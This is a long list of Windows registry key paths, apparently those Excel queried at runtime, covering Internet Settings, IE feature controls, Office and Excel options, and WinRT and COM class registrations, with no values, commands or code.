HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PROTOCOL_LOCKDOWN\EXCEL.EXE
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Category
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Name
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\ParentFolder
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Description
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\RelativePath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\ParsingName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\InfoTip
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\LocalizedName
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Icon
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Security
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\StreamResource
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\StreamResourceType
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Roamable
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\PreCreate
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Stream
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\PublishExpandedPath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\DefinitionFlags
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\Attributes
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\FolderTypeID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{352481E8-33BE-4251-BA85-6007CAEDCF9D}\InitFolderHandler
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Cache
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\Default
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Cache
HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSAPIforCrack
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\EXCEL.EXE
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLIENTAUTHCERTFILTER
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_HANDLING\EXCEL.EXE
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableZlibDeflate
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FromCacheTimeout
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SecureProtocols
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\LegacyTLSAppcompat
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\LegacyTLSAppcompat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\LegacyTLSAppcompat
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\LegacyTLSAppcompat
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\CertificateRevocation
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableKeepAlive
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IdnEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreConnectLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\PreResolveLimit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CacheMode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttp1_1
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyHttp1.1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBasicOverClearChannel
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnableAutoProxyResultCache
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\DisplayScriptDownloadFailureUI
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\MBCSServername
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\UTF8ServerNameRes
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableReadRange
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketSendBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SocketReceiveBufferLength
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\KeepAliveTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxHttpRedirects
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerServer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPer1_0Server
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerProxy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerProxy
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\MaxConnectionsPerProxy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ServerInfoTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ConnectRetries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\SendTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ReceiveTimeOut
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DisableNTLMPreAuth
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CertCacheNoValidate
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HttpDefaultExpiryTimeSecs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\FtpDefaultExpiryTimeSecs
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\DisableCachingOfSSLPages
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\LeashLegacyCookies
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DialupUseLanSettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SendExtraCRLF
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\BypassHTTPNoCacheCheck
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\BypassSSLNoCacheCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttpTrace
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnableHttpTrace
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\NoCheckAutodialOverRide
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DontUseDNSLoadBalancing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ShareCredsWithWinHttp
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ShareCredsWithWinHttp
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\MimeExclusionListForCache
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\HeaderExclusionListForCache
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Containers\SecureAutoProxy
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download\FeatureEnableTokenBindingOverride
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEnabled
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheEntries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\DnsCacheTimeout
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPost
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnAlwaysOnPost
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnZoneCrossing
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnBadCertRecving
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnPostRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AlwaysDrainOnRedirect
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnHTTPSToHTTPRedirect
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\TcpAutotuning
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\TcpAutotuning
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DisableHttp2ConnectionSharing
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DisableHttp2ConnectionSharing
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\EnableInsecureTlsFallback
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnableInsecureTlsFallback
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnableInsecureTlsFallback
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\TrustLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.ApplicationModel.Core.CoreApplication\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\TrustLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\RemoteServer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\ActivateAsUser
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\ActivateInSharedBroker
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\ActivateInBrokerForMediumILContainer
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\Permissions
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Foundation.Collections.PropertySet\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\XAML\OneCoreTransformsEnabledByDefault
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{2DBDBA9D-20DA-519D-9078-09F835BC5BC7}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\ActivateOnHostFlags
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\InprocServer32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{144C71F2-7F10-4AB2-BB07-C38F5B9AE05E}\InprocServer32\ThreadingModel
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyQueryWithFullUrl
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\BadProxyExpiresTime
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoProxyDetectType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBranchCache
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\DisableBranchCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EdpEnforcementOverride
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EdpEnforcementOverride
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\QuicTestHost
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\ValidationSinkHandlerName
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\PrivacyDialogsDisabled
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\MigrateProxy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A00
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1A00
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{B196B284-BAB4-101A-B69C-00AA00341D07}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{B196B286-BAB4-101A-B69C-00AA00341D07}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{1299CF18-C4F5-4B6A-BB0F-2299F0398E27}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\Interface\{733B7764-5C0C-4AD6-BB4B-D0585E993E0E}\ProxyStubClsid32\(Default)
HKEY_USERS\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\Policies\0ff1ce15-a989-479d-af46-f275c6370663\de52bd50-9564-4adc-8fcb-a345c17f84f9\Value
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Viewer
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\LicenseAggregateSubscription
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\ViewerMode
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\CurrentSkuIdAggregationForApp\Excel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DisableRobustifiedUNC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Defender\Features\SenseDlpEnabled
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Font
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\MemoryLevelOverride
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\UndoHistory
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DontSupportUndoForLargePivotTables
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\PivotTableUndoRowThousandCount
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DontSupportUndoForLargeDataModels
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\PivotTableUndoDataModelSize
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\PreferExcelDataModel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DontSuggestCompatFmlaVariation
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\DisableIdleMemoryFlush
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\DisableEDPIsIdentityManagedGate
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\ActivationType
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\Server
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\DllPath
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\Threading
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\TrustLevel
HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsRuntime\ActivatableClassId\Windows.Security.EnterpriseData.ProtectionPolicyManager\RemoteServer
